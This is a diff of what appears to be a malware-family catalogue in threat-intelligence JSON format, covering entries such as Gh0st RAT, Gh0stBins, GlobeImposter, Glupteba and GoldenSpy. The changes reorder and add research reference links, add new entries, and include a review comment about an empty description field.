- "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf",
 "https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/",
- "https://www.telekom.com/en/blog/group/article/inside-of-cl0p-s-ransomware-operation-615824",
- "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf",
- "https://www.telekom.com/en/blog/group/article/eager-beaver-a-short-overview-of-the-restless-threat-actor-ta505-609546",
- "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf",
- "https://www.secureworks.com/research/threat-profiles/gold-tahoe",
- "https://elis531989.medium.com/funtastic-packers-and-where-to-find-them-41429a7ef9a7",
 "https://intel471.com/blog/a-brief-history-of-ta505",
- "https://www.proofpoint.com/us/threat-insight/post/ta505-distributes-new-sdbbot-remote-access-trojan-get2-downloader"
+ "https://www.hornetsecurity.com/en/security-information/clop-clop-ta505-html-malspam-analysis/",
+ "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-009.pdf",
+ "https://www.proofpoint.com/us/threat-insight/post/ta505-distributes-new-sdbbot-remote-access-trojan-get2-downloader",
+ "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf",
+ "https://www.telekom.com/en/blog/group/article/cybersecurity-ta505-returns-with-a-new-bag-of-tricks-602104",
+ "https://blog.intel471.com/2020/07/15/flowspec-ta505s-bulletproof-hoster-of-choice/",
+ "https://intel471.com/blog/ta505-get2-loader-malware-december-2020/",
+ "https://www.goggleheadedhacker.com/blog/post/13",
+ "https://github.com/StrangerealIntel/CyberThreatIntel/blob/master/cybercriminal%20groups/TA505/04-10-2019/Malware%20Analysis%2004-10-2019.md",
+ "https://elis531989.medium.com/funtastic-packers-and-where-to-find-them-41429a7ef9a7",
+ "https://github.com/Tera0017/TAFOF-Unpacker",
+ "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf",
+ "https://www.telekom.com/en/blog/group/article/cybersecurity-ta505-s-box-of-chocolate-597672",
+ "https://www.telekom.com/en/blog/group/article/inside-of-cl0p-s-ransomware-operation-615824",
+ "https://www.secureworks.com/research/threat-profiles/gold-tahoe",
+ "https://www.proofpoint.com/us/threat-insight/post/coronavirus-threat-landscape-update",
+ "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf",
+ "https://blog.fox-it.com/2020/11/16/ta505-a-brief-history-of-their-time/",
+ "https://www.telekom.com/en/blog/group/article/eager-beaver-a-short-overview-of-the-restless-threat-actor-ta505-609546",
+ "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf"
 ],
 "synonyms": [
 "FRIENDSPEAK",
@@ -25761,12 +26935,12 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.getmypass",
- "https://github.com/malware-kitten/securitykitten.github.io/blob/master/_posts/2015-01-08-getmypass-point-of-sale-malware-update.md",
- "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/the-evolution-of-point-of-sale-pos-malware",
- "https://securitykitten.github.io/2015/01/08/getmypass-point-of-sale-malware-update.html",
 "https://github.com/malware-kitten/securitykitten.github.io/blob/master/_posts/2014-11-26-getmypass-point-of-sale-malware.md",
+ "https://blog.trendmicro.com/trendlabs-security-intelligence/new-pos-malware-kicks-off-holiday-shopping-weekend/",
+ "https://securitykitten.github.io/2015/01/08/getmypass-point-of-sale-malware-update.html",
 "https://securitykitten.github.io/2014/11/26/getmypass-point-of-sale-malware.html",
- "https://blog.trendmicro.com/trendlabs-security-intelligence/new-pos-malware-kicks-off-holiday-shopping-weekend/"
+ "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/the-evolution-of-point-of-sale-pos-malware",
+ "https://github.com/malware-kitten/securitykitten.github.io/blob/master/_posts/2015-01-08-getmypass-point-of-sale-malware-update.md"
 ],
 "synonyms": [
 "getmypos"
@@ -25789,13 +26963,29 @@
 "uuid": "a762023d-8d46-43a8-be01-3b2362963de0",
 "value": "get_pwd"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.gh0stbins",
+ "https://any.run/cybersecurity-blog/gh0stbins-chinese-rat-malware-analysis/"
+ ],
+ "synonyms": [
+ "Gh0stBins RAT"
+ ],
+ "type": []
+ },
+ "uuid": "07ef4b03-c512-490c-905a-f7c2e3a47eba",
+ "value": "Gh0stBins"
+ },
 {
 "description": "Custom RAT developed by the BlackTech actor, based on the Gh0st RAT.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.gh0sttimes",
- "https://blogs.jpcert.or.jp/en/2021/10/gh0sttimes.html",
- "https://jp.security.ntt/resources/EN-BlackTech_2021.pdf"
+ "https://jp.security.ntt/resources/EN-BlackTech_2021.pdf",
+ "https://www.youtube.com/watch?v=uakw2HMGZ-I",
+ "https://blogs.jpcert.or.jp/en/2021/10/gh0sttimes.html"
 ],
 "synonyms": [],
 "type": []
@@ -25821,9 +27011,9 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.ghole",
- "https://documents.trendmicro.com/assets/wp/wp-operation-woolen-goldfish.pdf",
 "http://www.trendmicro.it/media/wp/operation-woolen-goldfish-whitepaper-en.pdf",
- "https://www.clearskysec.com/gholee-a-protective-edge-themed-spear-phishing-campaign/"
+ "https://www.clearskysec.com/gholee-a-protective-edge-themed-spear-phishing-campaign/",
+ "https://documents.trendmicro.com/assets/wp/wp-operation-woolen-goldfish.pdf"
 ],
 "synonyms": [
 "CoreImpact (Modified)",
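Review bot: The new Gh0stBins entry is added with `"description": ""`, while every other entry in this diff, including the Gh0stTimes entry immediately below it, carries at least a one-line summary, and an empty string is easy to mistake for a value that was populated and then lost. Either fill it in from the two references the entry already cites, or, if the cluster schema tolerates a missing key, omit it rather than emit a blank so consumers can tell "no description" from "empty description". The rest of the entry (uuid, synonym, refs, empty type list) is consistent with its neighbours.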
@@ -25856,8 +27046,8 @@
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.ghostnet",
 "https://documents.trendmicro.com/assets/wp/wp-detecting-apt-activity-with-network-traffic-analysis.pdf",
 "https://www.nartv.org/2019/03/28/10-years-since-ghostnet/",
- "https://en.wikipedia.org/wiki/GhostNet",
- "http://contagiodump.blogspot.com/2011/07/jul-25-mac-olyx-gh0st-backdoor-in-rar.html"
+ "http://contagiodump.blogspot.com/2011/07/jul-25-mac-olyx-gh0st-backdoor-in-rar.html",
+ "https://en.wikipedia.org/wiki/GhostNet"
 ],
 "synonyms": [
 "Remosh"
@@ -25872,8 +27062,8 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.ghost_admin",
- "https://www.bleepingcomputer.com/news/security/new-ghostadmin-malware-used-for-data-theft-and-exfiltration/",
- "https://www.cylance.com/en_us/blog/threat-spotlight-ghostadmin.html"
+ "https://www.cylance.com/en_us/blog/threat-spotlight-ghostadmin.html",
+ "https://www.bleepingcomputer.com/news/security/new-ghostadmin-malware-used-for-data-theft-and-exfiltration/"
 ],
 "synonyms": [
 "Ghost iBot"
@@ -25884,75 +27074,76 @@ "value": "GhostAdmin" }, { - "description": "According to Security Ninja, Gh0st RAT (Remote Access Terminal) is a trojan “Remote Access Tool” used on Windows platforms, and has been used to hack into some of the most sensitive computer networks on Earth.\r\n\r\nBelow is a list of Gh0st RAT capabilities.\r\nTake full control of the remote screen on the infected bot.\r\nProvide real time as well as offline keystroke logging.\r\nProvide live feed of webcam, microphone of infected host.\r\nDownload remote binaries on the infected remote host.\r\nTake control of remote shutdown and reboot of host.\r\nDisable infected computer remote pointer and keyboard input.\r\nEnter into shell of remote infected host with full control.\r\nProvide a list of all the active processes.\r\nClear all existing SSDT of all existing hooks.", + "description": "According to Security Ninja, Gh0st RAT (Remote Access Terminal) is a trojan \u201cRemote Access Tool\u201d used on Windows platforms, and has been used to hack into some of the most sensitive computer networks on Earth.\r\n\r\nBelow is a list of Gh0st RAT capabilities.\r\nTake full control of the remote screen on the infected bot.\r\nProvide real time as well as offline keystroke logging.\r\nProvide live feed of webcam, microphone of infected host.\r\nDownload remote binaries on the infected remote host.\r\nTake control of remote shutdown and reboot of host.\r\nDisable infected computer remote pointer and keyboard input.\r\nEnter into shell of remote infected host with full control.\r\nProvide a list of all the active processes.\r\nClear all existing SSDT of all existing hooks.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ghost_rat", - "http://download01.norman.no/documents/ThemanyfacesofGh0stRat.pdf", - "https://attack.mitre.org/groups/G0096", - "https://documents.trendmicro.com/assets/Appendix_Water-Pamola-Attacked-Online-Shops-Via-Malicious-Orders.pdf", - 
"https://cofense.com/blog/open-source-gh0st-rat-still-haunting-inboxes-15-years-after-release/", - "https://www.secureworks.com/research/threat-profiles/bronze-union", - "https://labs.bitdefender.com/2018/02/operation-pzchao-a-possible-return-of-the-iron-tiger-apt/", - "https://www.cisecurity.org/insights/blog/top-10-malware-march-2022", - "https://blog.prevailion.com/2020/06/the-gh0st-remains-same8.html", - "https://tccontre.blogspot.com/2021/02/gh0strat-anti-debugging-nested-seh-try.html", - "https://asec.ahnlab.com/en/32572/", - "https://www.secureworks.com/research/a-peek-into-bronze-unions-toolbox", - "https://www.trendmicro.com/en_us/research/22/d/new-apt-group-earth-berberoka-targets-gambling-websites-with-old.html", - "https://medium.com/insomniacs/what-happened-between-the-bigbadwolf-and-the-tiger-925549a105b2", - "https://risky.biz/whatiswinnti/", - "https://www.microsoft.com/security/blog/2019/12/12/gallium-targeting-global-telecom/", - "https://www.proofpoint.com/sites/default/files/pfpt-us-wp-north-korea-bitten-by-bitcoin-bug.pdf", - "https://blog.cylance.com/the-ghost-dragon", - "https://thehackernews.com/2022/04/chinese-hackers-target-vmware-horizon.html", - "https://www.trendmicro.com/en_us/research/21/l/collecting-in-the-dark-tropic-trooper-targets-transportation-and-government-organizations.html", - "https://blog.bushidotoken.net/2020/06/deep-dive-darkhotel-apt.html", - "http://www.nartv.org/mirror/ghostnet.pdf", - "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf", - "https://attack.mitre.org/groups/G0011", - "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/april/decoding-network-data-from-a-gh0st-rat-variant/", - "https://www.secureworks.com/research/threat-profiles/bronze-fleetwood", - "https://blog.talosintelligence.com/2019/09/panda-evolution.html", - 
"https://www.trendmicro.com/en_us/research/21/d/water-pamola-attacked-online-shops-via-malicious-orders.html", - "https://st.drweb.com/static/new-www/news/2020/october/Study_of_the_ShadowPad_APT_backdoor_and_its_relation_to_PlugX_en.pdf", - "https://blog.talosintelligence.com/2022/02/threat-roundup-0204-0211.html", - "https://www.seqrite.com/blog/rat-used-by-chinese-cyberspies-infiltrating-indian-businesses/", - "https://www.bitdefender.com/files/News/CaseStudies/study/185/Bitdefender-Business-2017-WhitePaper-PZCHAO-crea2452-en-EN-GenericUse.pdf", - "https://attack.mitre.org/groups/G0026", - "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/webworm-espionage-rats", - "https://www.zscaler.com/blogs/security-research/catching-rats-over-custom-protocols", - "https://decoded.avast.io/luigicamastra/apt-group-planted-backdoors-targeting-high-profile-networks-in-central-asia", + "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/covid-19-and-new-year-greetings-the-higaisa-group/", "https://www.fortinet.com/blog/threat-research/deep-panda-log4shell-fire-chili-rootkits", - "https://www.proofpoint.com/us/threat-insight/post/north-korea-bitten-bitcoin-bug-financially-motivated-campaigns-reveal-new", - "https://www.welivesecurity.com/2021/02/01/operation-nightscout-supply-chain-attack-online-gaming-asia/", - "https://st.drweb.com/static/new-www/news/2021/april/drweb_research_attacks_on_russian_research_institutes_en.pdf", - "https://www.secureworks.com/research/threat-profiles/bronze-edison", - "https://www.botconf.eu/wp-content/uploads/2022/05/Botconf2022-40-LunghiHorejsi.pdf", - "https://www.datanet.co.kr/news/articleView.html?idxno=133346", - "https://attack.mitre.org/groups/G0001/", - "https://blogs.jpcert.or.jp/en/2021/10/gh0sttimes.html", + "https://asec.ahnlab.com/en/32572/", + "https://www.youtube.com/watch?v=uakw2HMGZ-I", + "https://labs.bitdefender.com/2018/02/operation-pzchao-a-possible-return-of-the-iron-tiger-apt/", + 
"https://hackcon.org/uploads/327/05%20-%20Kwak.pdf", + "https://www.intezer.com/blog-chinaz-relations/", + "https://blog.cylance.com/the-ghost-dragon", + "https://www.secureworks.com/research/threat-profiles/bronze-union", "https://unit42.paloaltonetworks.com/atoms/iron-taurus/", "https://www.prevailion.com/the-gh0st-remains-the-same-2/", + "https://www.trendmicro.com/en_us/research/21/d/water-pamola-attacked-online-shops-via-malicious-orders.html", + "https://st.drweb.com/static/new-www/news/2021/april/drweb_research_attacks_on_russian_research_institutes_en.pdf", + "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf", + "https://blog.talosintelligence.com/2022/02/threat-roundup-0204-0211.html", "http://www.hexblog.com/?p=1248", - "https://documents.trendmicro.com/assets/white_papers/wp-operation-earth-berberoka.pdf", - "https://www.intezer.com/blog/malware-analysis/chinaz-relations/", - "https://www.secureworks.com/research/threat-profiles/bronze-globe", - "https://us-cert.cisa.gov/ncas/alerts/aa20-345a", - "https://intel471.com/blog/china-cybercrime-undergrond-deepmix-tea-horse-road-great-firewall/", - "https://research.nccgroup.com/2018/04/17/decoding-network-data-from-a-gh0st-rat-variant/", "https://www.sophos.com/en-us/medialibrary/PDFs/technical-papers/sophoslabs-cloud-snooper-report.pdf", - "https://www.nttsecurity.com/docs/librariesprovider3/default-document-library/craftypanda-analysis-report", - "https://www.intezer.com/blog-chinaz-relations/", - "https://web.archive.org/web/20140816135909/https://www.symantec.com/connect/blogs/inside-back-door-attack", - "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/covid-19-and-new-year-greetings-the-higaisa-group/", - "https://web.archive.org/web/20170311192337/http://download01.norman.no:80/documents/ThemanyfacesofGh0stRat.pdf", "http://www.malware-traffic-analysis.net/2018/01/04/index.html", - 
"https://labs.bitdefender.com/wp-content/uploads/downloads/operation-pzchao-inside-a-highly-specialized-espionage-infrastructure/", + "https://risky.biz/whatiswinnti/", + "https://medium.com/insomniacs/what-happened-between-the-bigbadwolf-and-the-tiger-925549a105b2", + "https://attack.mitre.org/groups/G0026", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/webworm-espionage-rats", "https://raw.githubusercontent.com/yt0ng/cracking_softcell/main/Cracking_SOFTCLL_TLP_WHITE.pdf", + "https://www.secureworks.com/research/threat-profiles/bronze-globe", + "http://www.nartv.org/mirror/ghostnet.pdf", + "https://www.bitdefender.com/files/News/CaseStudies/study/185/Bitdefender-Business-2017-WhitePaper-PZCHAO-crea2452-en-EN-GenericUse.pdf", + "https://www.botconf.eu/wp-content/uploads/2022/05/Botconf2022-40-LunghiHorejsi.pdf", + "https://st.drweb.com/static/new-www/news/2020/october/Study_of_the_ShadowPad_APT_backdoor_and_its_relation_to_PlugX_en.pdf", + "https://www.nttsecurity.com/docs/librariesprovider3/default-document-library/craftypanda-analysis-report", + "https://www.trendmicro.com/en_us/research/21/l/collecting-in-the-dark-tropic-trooper-targets-transportation-and-government-organizations.html", + "https://www.zscaler.com/blogs/security-research/catching-rats-over-custom-protocols", + "https://research.nccgroup.com/2018/04/17/decoding-network-data-from-a-gh0st-rat-variant/", + "https://blog.bushidotoken.net/2020/06/deep-dive-darkhotel-apt.html", + "https://us-cert.cisa.gov/ncas/alerts/aa20-345a", + "https://www.trendmicro.com/en_us/research/22/d/new-apt-group-earth-berberoka-targets-gambling-websites-with-old.html", + "https://blogs.jpcert.or.jp/en/2021/10/gh0sttimes.html", + "https://attack.mitre.org/groups/G0096", + "https://www.secureworks.com/research/a-peek-into-bronze-unions-toolbox", + "https://documents.trendmicro.com/assets/Appendix_Water-Pamola-Attacked-Online-Shops-Via-Malicious-Orders.pdf", + 
"https://cofense.com/blog/open-source-gh0st-rat-still-haunting-inboxes-15-years-after-release/", + "https://documents.trendmicro.com/assets/white_papers/wp-operation-earth-berberoka.pdf", + "https://www.datanet.co.kr/news/articleView.html?idxno=133346", + "https://www.microsoft.com/security/blog/2019/12/12/gallium-targeting-global-telecom/", + "https://web.archive.org/web/20170311192337/http://download01.norman.no:80/documents/ThemanyfacesofGh0stRat.pdf", + "https://thehackernews.com/2022/04/chinese-hackers-target-vmware-horizon.html", + "https://web.archive.org/web/20140816135909/https://www.symantec.com/connect/blogs/inside-back-door-attack", + "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/april/decoding-network-data-from-a-gh0st-rat-variant/", + "https://www.secureworks.com/research/threat-profiles/bronze-fleetwood", "https://s.tencent.com/research/report/836.html", - "https://hackcon.org/uploads/327/05%20-%20Kwak.pdf", - "https://blogs.blackberry.com/en/2021/10/drawing-a-dragon-connecting-the-dots-to-find-apt41" + "https://www.cisecurity.org/insights/blog/top-10-malware-march-2022", + "https://attack.mitre.org/groups/G0001/", + "https://blogs.blackberry.com/en/2021/10/drawing-a-dragon-connecting-the-dots-to-find-apt41", + "https://decoded.avast.io/luigicamastra/apt-group-planted-backdoors-targeting-high-profile-networks-in-central-asia", + "https://www.intezer.com/blog/malware-analysis/chinaz-relations/", + "https://www.proofpoint.com/us/threat-insight/post/north-korea-bitten-bitcoin-bug-financially-motivated-campaigns-reveal-new", + "https://tccontre.blogspot.com/2021/02/gh0strat-anti-debugging-nested-seh-try.html", + "https://www.welivesecurity.com/2021/02/01/operation-nightscout-supply-chain-attack-online-gaming-asia/", + "https://attack.mitre.org/groups/G0011", + "https://intel471.com/blog/china-cybercrime-undergrond-deepmix-tea-horse-road-great-firewall/", + "https://www.secureworks.com/research/threat-profiles/bronze-edison", + 
"https://www.seqrite.com/blog/rat-used-by-chinese-cyberspies-infiltrating-indian-businesses/", + "http://download01.norman.no/documents/ThemanyfacesofGh0stRat.pdf", + "https://labs.bitdefender.com/wp-content/uploads/downloads/operation-pzchao-inside-a-highly-specialized-espionage-infrastructure/", + "https://blog.prevailion.com/2020/06/the-gh0st-remains-same8.html", + "https://www.proofpoint.com/sites/default/files/pfpt-us-wp-north-korea-bitten-by-bitcoin-bug.pdf", + "https://blog.talosintelligence.com/2019/09/panda-evolution.html" ], "synonyms": [ "Farfli", @@ -26003,6 +27194,20 @@ "uuid": "6ad51e4a-b44d-43c8-9f55-b9fe06a2c06d", "value": "Giffy" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.gimmick", + "http://stillu.cc/assets/slides/2023-08-Unmasking%20CamoFei.pdf", + "https://www.volexity.com/blog/2022/03/22/storm-cloud-on-the-horizon-gimmick-malware-strikes-at-macos/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "59e8424b-f2e6-4542-bbb3-0e62a4596a01", + "value": "GIMMICK (Windows)" + }, { "description": "", "meta": { @@ -26021,10 +27226,10 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ginzo", + "https://www.govcert.ch/downloads/whitepapers/Unflattening-ConfuserEx-Code-in-IDA.pdf", "https://ke-la.com/information-stealers-a-new-landscape/", "https://blog.talosintelligence.com/haskers-gang-zingostealer/", - "https://twitter.com/struppigel/status/1506933328599044100", - "https://www.govcert.ch/downloads/whitepapers/Unflattening-ConfuserEx-Code-in-IDA.pdf" + "https://twitter.com/struppigel/status/1506933328599044100" ], "synonyms": [], "type": [] 
@@ -26077,27 +27282,27 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.globeimposter", - "https://www.youtube.com/watch?v=LUxOcpIRxmg", - "https://blog.ensilo.com/globeimposter-ransomware-technical", - "https://www.acronis.com/en-us/blog/posts/globeimposter-ransomware-holiday-gift-necurs-botnet", - "https://www.proofpoint.com/us/threat-insight/post/holiday-lull-not-so-much", - "https://blog.fortinet.com/2017/08/05/analysis-of-new-globeimposter-ransomware-variant", - "https://www.crowdstrike.com/blog/ransomware-preparedness-a-call-to-action/", - "https://asec.ahnlab.com/en/48940/", - "https://info.phishlabs.com/blog/globe-imposter-ransomware-makes-a-new-run", - "https://blog.360totalsecurity.com/en/globeimposter-which-has-more-than-20-variants-is-still-wildly-growing/", - "https://asec.ahnlab.com/ko/30284/", "https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/", - "https://www.bleepingcomputer.com/news/security/new-doc-globeimposter-ransomware-variant-malspam-campaign-underway/", - "https://go.group-ib.com/rs/689-LRE-818/images/Group-IB_Ransomware_whitepaper_eng.pdf", - "https://www.emsisoft.com/ransomware-decryption-tools/globeimposter", - "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf", - "https://www.secureworks.com/research/threat-profiles/gold-swathmore", - "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_1_tamada-yamazaki-nakatsuru_en.pdf", - "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf", - "https://www.sentinelone.com/blog/recent-tzw-campaigns-revealed-as-part-of-globeimposter-malware-family/", "https://intel471.com/blog/a-brief-history-of-ta505", - "https://isc.sans.edu/diary/23417" + "https://www.sentinelone.com/blog/recent-tzw-campaigns-revealed-as-part-of-globeimposter-malware-family/", + "https://www.crowdstrike.com/blog/ransomware-preparedness-a-call-to-action/", + "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_1_tamada-yamazaki-nakatsuru_en.pdf", + 
"https://asec.ahnlab.com/ko/30284/", + "https://www.proofpoint.com/us/threat-insight/post/holiday-lull-not-so-much", + "https://blog.360totalsecurity.com/en/globeimposter-which-has-more-than-20-variants-is-still-wildly-growing/", + "https://asec.ahnlab.com/en/48940/", + "https://www.acronis.com/en-us/blog/posts/globeimposter-ransomware-holiday-gift-necurs-botnet", + "https://www.secureworks.com/research/threat-profiles/gold-swathmore", + "https://www.youtube.com/watch?v=LUxOcpIRxmg", + "https://www.bleepingcomputer.com/news/security/new-doc-globeimposter-ransomware-variant-malspam-campaign-underway/", + "https://blog.ensilo.com/globeimposter-ransomware-technical", + "https://www.emsisoft.com/ransomware-decryption-tools/globeimposter", + "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf", + "https://info.phishlabs.com/blog/globe-imposter-ransomware-makes-a-new-run", + "https://isc.sans.edu/diary/23417", + "https://go.group-ib.com/rs/689-LRE-818/images/Group-IB_Ransomware_whitepaper_eng.pdf", + "https://blog.fortinet.com/2017/08/05/analysis-of-new-globeimposter-ransomware-variant", + "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf" ], "synonyms": [ "Fake Globe" 
@@ -26137,31 +27342,32 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.glupteba", - "https://www.welivesecurity.com/2014/03/18/operation-windigo-the-vivisection-of-a-large-linux-server-side-credential-stealing-malware-campaign/", - "https://habr.com/ru/company/solarsecurity/blog/578900/", - "https://www.nozominetworks.com/blog/tracking-malicious-glupteba-activity-through-the-blockchain/", - "https://storage.googleapis.com/gweb-uniblog-publish-prod/documents/1_Complaint.pdf", - "https://dissectingmalwa.re/the-blame-game-about-false-flags-and-overwritten-mbrs.html", "https://blog.trendmicro.com/trendlabs-security-intelligence/glupteba-campaign-hits-network-routers-and-updates-cc-servers-with-data-from-bitcoin-transactions/", - "https://news.sophos.com/en-us/2020/06/24/glupteba-report/?cmp=30728", - "https://www.welivesecurity.com/2011/03/02/tdl4-and-glubteba-piggyback-piggybugs/", - "https://www.domaintools.com/resources/blog/identifying-network-infrastructure-related-to-a-who-spoofing-campaign", - "https://medium.com/csis-techblog/installcapital-when-adware-becomes-pay-per-install-cyber-crime-15516249a451", - "https://community.riskiq.com/article/2a36a7d2/description", - "https://blog.chainalysis.com/reports/2022-crypto-crime-report-preview-malware/", "https://blog.google/technology/safety-security/new-action-combat-cyber-crime/", - "https://blog.google/threat-analysis-group/disrupting-glupteba-operation/", - "https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/", - "https://nakedsecurity.sophos.com/2020/06/24/glupteba-the-bot-that-gets-secret-messages-from-the-bitcoin-blockchain/", - "https://labs.k7computing.com/?p=22319", - "https://www.welivesecurity.com/2018/03/22/glupteba-no-longer-windigo/", - "http://resources.infosecinstitute.com/tdss4-part-1/", - "https://krebsonsecurity.com/2022/06/the-link-between-awm-proxy-the-glupteba-botnet/?utm_source=dlvr.it&utm_medium=twitter", + 
"https://www.bitdefender.com/files/News/CaseStudies/study/400/Bitdefender-PR-Whitepaper-MosaicLoader-creat5540-en-EN.pdf", "https://thehackernews.com/2022/03/over-200000-microtik-routers-worldwide.html", - "https://www.intezer.com/wp-content/uploads/2021/02/Intezer-2020-Go-Malware-Round-Up.pdf", - "https://decoded.avast.io/martinhron/meris-and-trickbot-standing-on-the-shoulders-of-giants/", + "https://www.domaintools.com/resources/blog/identifying-network-infrastructure-related-to-a-who-spoofing-campaign", + "https://www.welivesecurity.com/2014/03/18/operation-windigo-the-vivisection-of-a-large-linux-server-side-credential-stealing-malware-campaign/", + "https://cocomelonc.github.io/malware/2023/06/19/malware-av-evasion-17.html", + "https://habr.com/ru/company/solarsecurity/blog/578900/", + "https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/", + "https://storage.googleapis.com/gweb-uniblog-publish-prod/documents/1_Complaint.pdf", + "https://labs.k7computing.com/?p=22319", + "https://news.sophos.com/en-us/2020/06/24/glupteba-report/?cmp=30728", + "https://blog.google/threat-analysis-group/disrupting-glupteba-operation/", + "https://blog.chainalysis.com/reports/2022-crypto-crime-report-preview-malware/", "https://www.trendmicro.com/en_us/research/21/j/ransomware-operators-found-using-new-franchise-business-model.html", - "https://www.bitdefender.com/files/News/CaseStudies/study/400/Bitdefender-PR-Whitepaper-MosaicLoader-creat5540-en-EN.pdf" + "https://community.riskiq.com/article/2a36a7d2/description", + "http://resources.infosecinstitute.com/tdss4-part-1/", + "https://www.nozominetworks.com/blog/tracking-malicious-glupteba-activity-through-the-blockchain/", + "https://krebsonsecurity.com/2022/06/the-link-between-awm-proxy-the-glupteba-botnet/?utm_source=dlvr.it&utm_medium=twitter", + "https://www.welivesecurity.com/2011/03/02/tdl4-and-glubteba-piggyback-piggybugs/", + 
"https://dissectingmalwa.re/the-blame-game-about-false-flags-and-overwritten-mbrs.html",
+ "https://decoded.avast.io/martinhron/meris-and-trickbot-standing-on-the-shoulders-of-giants/",
+ "https://medium.com/csis-techblog/installcapital-when-adware-becomes-pay-per-install-cyber-crime-15516249a451",
+ "https://nakedsecurity.sophos.com/2020/06/24/glupteba-the-bot-that-gets-secret-messages-from-the-bitcoin-blockchain/",
+ "https://www.intezer.com/wp-content/uploads/2021/02/Intezer-2020-Go-Malware-Round-Up.pdf",
+ "https://www.welivesecurity.com/2018/03/22/glupteba-no-longer-windigo/"
 ],
 "synonyms": [],
 "type": []
@@ -26202,9 +27408,9 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.godlike12",
- "https://www.volexity.com/blog/2020/03/31/storm-cloud-unleashed-tibetan-community-focus-of-highly-targeted-fake-flash-campaign/",
+ "https://securelist.com/apt-trends-report-q2-2020/97937/",
 "https://securelist.com/holy-water-ongoing-targeted-water-holing-attack-in-asia/96311/",
- "https://securelist.com/apt-trends-report-q2-2020/97937/"
+ "https://www.volexity.com/blog/2020/03/31/storm-cloud-unleashed-tibetan-community-focus-of-highly-targeted-fake-flash-campaign/"
 ],
 "synonyms": [
 "GOSLU"
@@ -26219,8 +27425,8 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.godoh",
- "https://github.com/sensepost/goDoH",
- "https://sensepost.com/blog/2018/waiting-for-godoh/"
+ "https://sensepost.com/blog/2018/waiting-for-godoh/",
+ "https://github.com/sensepost/goDoH"
 ],
 "synonyms": [],
 "type": []
@@ -26302,8 +27508,8 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.goldeneye",
- "https://blog.malwarebytes.com/cybercrime/2017/07/keeping-up-with-the-petyas-demystifying-the-malware-family/",
- "https://blog.malwarebytes.com/threat-analysis/2016/12/goldeneye-ransomware-the-petyamischa-combo-rebranded/"
+ "https://blog.malwarebytes.com/threat-analysis/2016/12/goldeneye-ransomware-the-petyamischa-combo-rebranded/",
+ "https://blog.malwarebytes.com/cybercrime/2017/07/keeping-up-with-the-petyas-demystifying-the-malware-family/"
 ],
 "synonyms": [
 "Petya/Mischa"
@@ -26328,19 +27534,19 @@
 "value": "GoldenHelper"
 },
 {
- "description": "",
+ "description": "According securityweek, GoldenSpy, the malware was observed as part of a campaign that supposedly started in April 2020, but some of the identified samples suggest the threat has been around since at least December 2016.\r\n\r\nOne of the compromised organizations, a global technology vendor that conducts government business in the US, Australia and UK, and which recently opened offices in China, became infected after installing \u201cIntelligent Tax,\u201d a piece of software from the Golden Tax Department of Aisino Corporation, which a local bank required for paying local taxes.\r\n\r\nAlthough it worked as advertised, the software was found to install a hidden backdoor to provide remote operators with the possibility to execute Windows commands or upload and run files.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.goldenspy",
- "https://www.bka.de/SharedDocs/Downloads/DE/IhreSicherheit/Warnhinweise/WarnhinweisGOLDENSPY.pdf",
